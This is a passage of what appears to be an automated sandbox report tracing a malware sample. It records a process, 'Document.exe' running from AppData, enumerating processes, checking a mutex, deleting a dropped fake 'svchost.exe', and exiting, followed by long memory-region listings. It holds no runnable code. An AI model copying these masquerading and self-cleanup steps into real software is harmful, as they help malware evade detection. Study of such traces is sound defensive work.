lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x698, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="stockportsconvenient.exe")) returned 1 [0191.799] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dangerous.exe")) returned 1 [0191.800] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="retained_one_psychology.exe")) returned 1 [0191.800] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x760, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pentium-southampton.exe")) returned 1 [0191.801] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="declare.exe")) returned 1 [0191.802] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="credit-albania.exe")) returned 1 [0191.803] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="celebrate.exe")) returned 1 [0191.850] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="watson_block.exe")) returned 1 [0191.851] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beef-http-plants.exe")) returned 1 [0191.852] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="hunting garmin marriage.exe")) returned 1 [0191.853] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portsmouth_sauce_certificates.exe")) returned 1 [0191.853] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="insights hu.exe")) returned 1 [0191.854] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x578, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="stroke_enough_reporter.exe")) returned 1 [0191.855] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="por tramadol started.exe")) returned 1 [0191.856] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="add.exe")) returned 1 [0191.857] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="argentinasovietavg.exe")) returned 1 [0191.857] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="EXCEL.EXE")) returned 1 [0191.858] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.859] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0191.860] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0191.860] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.861] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x36c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0191.862] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="Document.exe")) returned 1 [0191.863] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x81c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="Document.exe")) returned 1 [0191.863] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0191.864] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbfc, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0191.865] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbfc, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0191.866] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbfc, pcPriClassBase=6, dwFlags=0x0, szExeFile="officec2rclient.exe")) returned 0 [0191.867] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f6f4, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x37 [0191.867] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x1f, ProcessInformation=0x18f944, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18f944, ReturnLength=0x0) returned 0x0 [0191.867] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x1e, ProcessInformation=0x18f940, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18f940, ReturnLength=0x0) returned 0xc0000353 [0191.867] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe\" 1 \"C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe\" 1159BD3" [0191.868] CallWindowProcW (lpPrevWndFunc=0x260004, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x29bbf8 [0191.868] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe\" 1 \"C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe\" 1159BD3", pNumArgs=0x18f944 | out: pNumArgs=0x18f944) returned 0x29bbf8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" [0191.868] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\svchost.exe")) returned 0x2020 [0191.868] CallWindowProcW (lpPrevWndFunc=0x260004, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0191.868] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="1159BD3") returned 0x0 [0191.868] Sleep (dwMilliseconds=0x1f4) [0192.442] DeleteFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\svchost.exe")) returned 1 [0192.443] ExitProcess (uExitCode=0x0) Process: id = "7" image_name = "document.exe" filename = "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe" page_root = "0x3281e000" os_pid = "0x81c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xbcc" cmd_line = "\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1213 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1214 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1215 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1216 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1217 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1218 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1219 start_va = 0x400000 end_va = 0x4b2fff entry_point = 0x400000 region_type = mapped_file name = "document.exe" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe") Region: id = 1220 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1221 start_va = 0x77e20000 end_va = 0x77f9ffff entry_point = 0x77e20000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1222 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1223 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1224 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1225 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1226 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1227 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1228 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1229 start_va = 0x220000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 1230 start_va = 0x752a0000 end_va = 0x752a7fff entry_point = 0x752a0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1231 start_va = 0x752b0000 end_va = 0x7530bfff entry_point = 0x752b0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1232 start_va = 0x75310000 end_va = 0x7534efff entry_point = 0x75310000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1233 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1234 start_va = 0x1a0000 end_va = 0x206fff entry_point = 0x1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1235 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1236 start_va = 0x540000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1237 start_va = 0x74ba0000 end_va = 0x74ba8fff entry_point = 0x74ba0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1238 start_va = 0x75460000 end_va = 0x754e3fff entry_point = 0x75460000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 1239 start_va = 0x75970000 end_va = 0x7597bfff entry_point = 0x75970000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1240 start_va = 0x75980000 end_va = 0x759dffff entry_point = 0x75980000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1241 start_va = 0x759e0000 end_va = 0x759f8fff entry_point = 0x759e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1242 start_va = 0x75a10000 end_va = 0x75abbfff entry_point = 0x75a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1243 start_va = 0x75c60000 end_va = 0x75cb6fff entry_point = 0x75c60000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1244 start_va = 0x75cf0000 end_va = 0x75e4bfff entry_point = 0x75cf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1245 start_va = 0x75f40000 end_va = 0x75f85fff entry_point = 0x75f40000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1246 start_va = 0x75fa0000 end_va = 0x7603cfff entry_point = 0x75fa0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1247 start_va = 0x760d0000 end_va = 0x761bffff entry_point = 0x760d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1248 start_va = 0x76220000 end_va = 0x7632ffff entry_point = 0x76220000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1249 start_va = 0x76490000 end_va = 0x7652ffff entry_point = 0x76490000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1250 start_va = 0x76720000 end_va = 0x767aefff entry_point = 0x76720000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1251 start_va = 0x76a70000 end_va = 0x76afffff entry_point = 0x76a70000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1252 start_va = 0x76b00000 end_va = 0x77749fff entry_point = 0x76b00000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1253 start_va = 0x77780000 end_va = 0x777fafff entry_point = 0x77780000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 1254 start_va = 0x77810000 end_va = 0x77819fff entry_point = 0x77810000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1255 start_va = 0x77820000 end_va = 0x7791ffff entry_point = 0x77820000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1256 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x0 region_type = private name = "private_0x0000000077a20000" filename = "" Region: id = 1257 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x0 region_type = private name = "private_0x0000000077b20000" filename = "" Region: id = 1258 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1259 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1260 start_va = 0x640000 end_va = 0x7c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 1261 start_va = 0x75c00000 end_va = 0x75c5ffff entry_point = 0x75c00000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1262 start_va = 0x75e50000 end_va = 0x75f1bfff entry_point = 0x75e50000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1263 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1264 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1265 start_va = 0x7d0000 end_va = 0x950fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 1266 start_va = 0x960000 end_va = 0x1d5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 1267 start_va = 0x1ed0000 end_va = 0x1edffff entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 1268 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1275 start_va = 0x75210000 end_va = 0x7528ffff entry_point = 0x75210000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1276 start_va = 0x1ee0000 end_va = 0x20fffff entry_point = 0x0 region_type = private name = "private_0x0000000001ee0000" filename = "" Region: id = 1279 start_va = 0x1d60000 end_va = 0x1e3efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d60000" filename = "" Region: id = 1280 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1281 start_va = 0x751f0000 end_va = 0x75202fff entry_point = 0x751f0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1291 start_va = 0x2100000 end_va = 0x232ffff entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 1292 start_va = 0x2330000 end_va = 0x2c5ffff entry_point = 0x2330000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 1293 start_va = 0x3b0000 end_va = 0x3b6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1294 start_va = 0x3c0000 end_va = 0x3c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 1295 start_va = 0x2c60000 end_va = 0x3052fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c60000" filename = "" Region: id = 1296 start_va = 0x3060000 end_va = 0x2498ffff entry_point = 0x0 region_type = private name = "private_0x0000000003060000" filename = "" Region: id = 1300 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 1301 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 1302 start_va = 0x3060000 end_va = 0xb060fff entry_point = 0x0 region_type = private name = "private_0x0000000003060000" filename = "" Region: id = 1362 start_va = 0x4c0000 end_va = 0x4d0fff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1363 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1364 start_va = 0x4e0000 end_va = 0x4e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 1365 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1366 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1367 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1368 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1369 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1370 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1371 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1372 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1373 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1374 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1375 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1376 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1377 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1378 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1379 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1380 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1381 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1382 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1383 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1384 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1385 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = 